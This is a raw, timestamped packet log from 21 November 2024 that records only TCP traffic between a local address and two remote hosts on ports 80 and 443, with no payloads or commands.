                                                                                                                                                                                                            Nov 21, 2024 15:17:35.262186050 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.262728930 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.262734890 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.371004105 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.371120930 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.371187925 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.371695995 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.371735096 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.371783018 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.372045994 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.372098923 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.372157097 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.372674942 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.372894049 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.372939110 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.373397112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.373502016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.373625040 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.374121904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.374274015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.374319077 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376444101 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376493931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376530886 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376535892 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376568079 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376601934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376611948 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376638889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.376692057 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.377027988 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.377125978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.377163887 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.377724886 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.377861977 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.377980947 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.378437996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.378606081 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.378647089 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.379184961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.379275084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.379328966 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.379904032 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.379978895 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.380022049 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.380620003 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.380748034 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.380789042 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.381386995 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.381520033 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.381620884 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.382164955 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.382273912 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.382317066 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.382816076 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.382941961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.383065939 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.383546114 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.383658886 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.383764029 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.384274960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.384378910 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.384423971 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.384990931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.385209084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.385325909 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.385729074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.385831118 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.385873079 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.386475086 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.386591911 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.386643887 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.387248039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.387356997 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.387404919 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.387918949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.388046980 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.388094902 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.388641119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.388750076 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.388796091 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.389384031 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.389497995 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.389549017 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.390166998 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.390218973 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.390286922 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.390968084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.391091108 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.391133070 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.391618967 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.391769886 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.391841888 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.392307043 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.392394066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.392525911 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.393079042 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.393119097 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.393194914 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.393811941 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.394048929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.394129038 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.394509077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.394602060 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.394670010 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.394839048 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.395217896 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.395374060 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.395554066 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.395944118 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.396064997 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.396114111 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.396689892 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.396789074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.397145987 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.397444963 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.397572041 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.397619963 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.398124933 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.398263931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.398314953 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.398849010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.398987055 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.399038076 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.399597883 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.399826050 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.399888039 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.400516033 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.400568008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.400615931 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.401070118 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.401182890 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.401231050 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.401776075 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.401878119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.401926994 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.402508020 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.402625084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.402678967 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.403249025 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.403568029 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.403696060 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.404113054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.404280901 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.404397011 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.404740095 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.404877901 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.404961109 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.405407906 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.405551910 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.405638933 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.405934095 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.406234026 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.406339884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.406487942 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.406868935 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.406985044 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.407037020 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.407596111 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.407895088 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.407968044 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.408323050 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.408622026 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.408669949 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.408986092 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.451914072 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.581393957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.581456900 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.581512928 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.581693888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.581782103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.581899881 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.582427025 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.582571030 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.582616091 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.583105087 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.583374023 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.583389997 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.583425999 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.584141016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.584191084 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.584316015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.584841967 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.584887028 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.584923983 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.585558891 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.585601091 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.585643053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.586321115 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.586426020 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.586451054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.587035894 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.587088108 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.587132931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.587724924 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.587776899 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.587827921 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.588499069 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.588541985 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.588577986 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.589301109 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.589349031 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.589401007 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.589921951 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.589962959 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.590116024 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.590651989 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.590701103 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.590734005 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.591371059 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.591418028 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.591530085 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.592097044 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.592145920 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.592253923 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.592832088 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.592925072 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.592931032 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.593559027 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.593621969 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.593666077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.594332933 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.594386101 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.594428062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.595043898 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.595101118 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.595135927 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.595731020 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.595777035 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.595845938 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.596503019 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.596597910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.596635103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.597271919 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.597323895 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.597351074 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.597914934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.598001003 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.598018885 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.598649025 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.598694086 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.598764896 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.599666119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.599797010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.599841118 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.600117922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.600157976 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.600204945 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.600855112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.600967884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.601003885 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.601562023 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.601596117 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.601665974 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.602288961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.602335930 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.602358103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.603008986 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.603048086 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.603115082 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.603765011 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.603795052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.603806973 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.604496002 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.604540110 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.604584932 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.605340958 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.605384111 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.605464935 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.605942965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.605981112 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.606046915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.606662989 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.606703043 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.606780052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.607415915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.607484102 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.607526064 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.608109951 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.608150959 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.608222961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.608851910 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:35.608932972 CET8049778185.215.113.16192.168.2.6
